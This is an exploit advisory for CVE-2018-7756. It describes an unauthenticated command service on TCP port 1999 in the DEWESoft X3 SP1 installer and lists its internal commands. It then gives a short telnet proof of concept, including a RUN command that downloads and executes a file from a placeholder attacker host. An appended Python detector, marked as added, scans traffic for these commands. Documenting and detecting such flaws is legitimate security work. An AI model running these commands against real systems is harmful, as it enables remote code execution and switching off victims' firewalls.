Exploit for Windows platform in category remote exploits
[+] Credits: John Page (aka hyp3rlinx)
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication
for sessions on TCP port 1999. This allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after a full install.
Internal commands used by "RunExeFile.exe", for which I could not find any documentation:
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victim's browser and send them to a website for a drive-by download, etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then, from the TELNET session, execute it from the Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
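For detection, the following added example (not part of the original advisory) scans captured client-to-server payloads on TCP port 1999 for the command verbs listed above, including the "runexe" spelling used in the PoC. The session record layout, the severity labels, the assumption of one ASCII command per line, and the sample data are all constructed for illustration.

```python
import re
from collections import namedtuple

PORT = 1999  # TCP port named in the advisory
# Verbs from the advisory's command list, plus "RUNEXE" as typed in its PoC.
# The split into "high" and "info" is a triage assumption, not from the advisory.
HIGH = {"RUN", "RUNEX", "RUNEXE", "SETFIREWALL", "KILL", "SHUTDOWN", "SENDKEYS"}
INFO = {"GETFIREWALL", "USERNAME", "LIST", "DWPIPE"}
LAUNCH = {"RUN", "RUNEX", "RUNEXE"}

Finding = namedtuple("Finding", "src verb arg severity")

def parse_commands(payload: bytes):
    """Yield (verb, arg) for each known command line in a client payload.
    Assumes one ASCII command per line, as typed in a telnet session."""
    for raw in re.split(rb"[\r\n]+", payload):
        # Drop telnet option negotiation and other non-printable bytes.
        line = re.sub(rb"[^\x20-\x7e]", b"", raw).decode("ascii").strip()
        verb, _, arg = line.partition(" ")
        if verb.upper() in HIGH | INFO:
            yield verb.upper(), arg.strip()

def scan(sessions):
    """Return findings for sessions aimed at the launcher port."""
    findings = []
    for s in sessions:
        if s["dport"] != PORT:
            continue
        for verb, arg in parse_commands(s["payload"]):
            severity = "high" if verb in HIGH else "info"
            if verb in LAUNCH and re.match(r"(?i)https?://", arg):
                severity = "critical"  # launcher pointed at a remote URL
            findings.append(Finding(s["src"], verb, arg, severity))
    return findings

# Constructed sample sessions (documentation addresses, placeholder file names).
SAMPLE = [
    {"src": "192.0.2.10", "dport": 1999, "payload": b"\xff\xfb\x01RUN calc.exe\r\n"},
    {"src": "192.0.2.11", "dport": 1999,
     "payload": b"RUN http://example.invalid/sample.exe\r\n"
                b"runexe c:\\Users\\user\\Downloads\\sample.exe\r\nGETFIREWALL\r\n"},
    {"src": "192.0.2.12", "dport": 1999, "payload": b"hello\r\n"},
    {"src": "192.0.2.13", "dport": 443, "payload": b"RUN calc.exe\r\n"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f.severity:8} {f.src:12} {f.verb} {f.arg}")
```

Any match from outside the management network is worth investigating, since the service accepts these commands without authentication.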
# 0day.today [2018-04-02] #